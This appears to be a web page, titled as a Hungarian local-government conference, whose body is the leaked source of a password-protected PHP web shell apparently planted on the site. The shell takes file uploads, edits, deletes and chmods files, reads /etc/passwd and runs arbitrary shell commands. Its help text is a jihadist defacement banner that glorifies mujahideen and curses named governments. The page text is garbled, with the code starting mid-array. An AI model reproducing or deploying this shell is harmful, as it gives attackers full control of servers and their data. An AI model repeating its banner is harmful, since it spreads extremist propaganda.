| Önkormányzati konferencia az önállósodó településekkel |
|
'ClearScreen()',
'Clear History' => 'ClearHistory()',
'Can I function?' => "runcommand('canirun','GET')",
'Get server info' => "runcommand('showinfo','GET')",
'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
'Running processes' => "runcommand('ps -aux','GET')",
'Readme' => "runcommand('shellhelp','GET')"
);
$thisfile = basename(__FILE__);
$style = '';
$password='ashkan';
$sess = __FILE__.$password;
if(isset($_POST['p4ssw0rD']))
{
if($_POST['p4ssw0rD'] == $password)
{
$_SESSION[$sess] = $_POST['p4ssw0rD'];
}
else
{
die("Wrong password");
}
}
if($_SESSION[$sess] == $password)
{
if(isset($_SESSION['workdir']))
{
if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
{
chdir($_SESSION['workdir']);
}
}
if(isset($_FILES['uploadedfile']['name']))
{
$target_path = "./";
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
}
}
if(isset($_GET['runcmd']))
{
$cmd = $_GET['runcmd'];
print "".get_current_user()."~# ". htmlspecialchars($cmd)." "; if($cmd == "") { print "Empty Command..type \"shellhelp\" for some ehh...help"; } elseif($cmd == "upload") { print ' Uploading to: '.realpath("."); if(is_writable(realpath("."))) { print " I can write to this directory"; } else { print " I can't write to this directory, please choose another one."; } } elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file))) { if(file_exists($file[1]) && is_dir($file[1])) { chdir($file[1]); $_SESSION['workdir'] = $file[1]; print "Current directory changed to ".$file[1]; } else { print "Directory not found"; } } elseif(strtolower($cmd) == "shellhelp") { print ' Jihad is our way!!! Die as Syuhada or be a good moslem... free for Palestine,iraq,Afghanistan,somalia,and every moslem country No respect for nasionalism,democracy,capitalism,liberalism,n All ideology what contradiction in Al-Quran and sunnah Fuck to Israel,USA,UK,Indonesian government,Saudi government And Every government who always hating every mujahideen =[]= Soldiers of Allah was here and controlling your system =[]= '; } elseif(ereg("editfile (.*)",$cmd,$file)) { if(file_exists($file[1]) && !is_dir($file[1])) { print ""; } else { print "File not found."; } } elseif(ereg("deletefile (.*)",$cmd,$file)) { if(is_dir($file[1])) { if(rmdir($file[1])) { print "Directory succesfully deleted."; } else { print "Couldn't delete directory!"; } } else { if(unlink($file[1])) { print "File succesfully deleted."; } else { print "Couldn't delete file!"; } } } elseif(strtolower($cmd) == "canirun") { print "If any of these functions is Enabled, the shell will function like it should. "; if(function_exists(passthru)) { print "Passthru: Enabled "; } else { print "Passthru: Disabled "; } if(function_exists(exec)) { print "Exec: Enabled "; } else { print "Exec: Disabled "; } if(function_exists(system)) { print "System: Enabled "; } else { print "System: Disabled "; } if(function_exists(shell_exec)) { print "Shell_exec: Enabled "; } else { print "Shell_exec: Disabled "; } print " Safe mode will prevent some stuff, maybe command execution, if you're looking for a reason why the commands aren't executed, this is probally it. "; if( ini_get('safe_mode') ){ print "Safe Mode: Enabled"; } else { print "Safe Mode: Disabled"; } print " Open_basedir will block access to some files you shouldn't access. "; if( ini_get('open_basedir') ){ print "Open_basedir: Enabled"; } else { print "Open_basedir: Disabled"; } } //About the shell elseif(ereg("listdir (.*)",$cmd,$directory)) { if(!file_exists($directory[1])) { die("Directory not found"); } //Some variables chdir($directory[1]); $i = 0; $f = 0; $dirs = ""; $filez = ""; if(!ereg("/$",$directory[1])) //Does it end with a slash? { $directory[1] .= "/"; //If not, add one } print "Listing directory: ".$directory[1]." "; print "
Version $version"; } //Show info elseif(strtolower($cmd) == "showinfo") { if(function_exists(disk_free_space)) { $free = disk_free_space("/") / 1000000; } else { $free = "N/A"; } if(function_exists(disk_total_space)) { $total = trim(disk_total_space("/") / 1000000); } else { $total = "N/A"; } $path = realpath ("."); print "Free: $free / $total MB Current path: $path Uname -a Output: "; if(function_exists(passthru)) { passthru("uname -a"); } else { print "Passthru is disabled :("; } } //Read /etc/passwd elseif(strtolower($cmd) == "etcpasswdfile") { $pw = file('/etc/passwd/'); foreach($pw as $line) { print $line; } } //Execute any other command else { if(function_exists(passthru)) { passthru($cmd); } else { if(function_exists(exec)) { exec("ls -la",$result); foreach($result as $output) { print $output." "; } } else { if(function_exists(system)) { system($cmd); } else { if(function_exists(shell_exec)) { print shell_exec($cmd); } else { print "Sorry, none of the command functions works."; } } } } } } elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent'])) { $file = $_POST['filetosave']; if(!is_writable($file)) { if(!chmod($file, 0777)) { die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^ } } $fh = fopen($file, 'w'); $dt = $_POST['filecontent']; fwrite($fh, $dt); fclose($fh); } else { ?>
| ||||||||||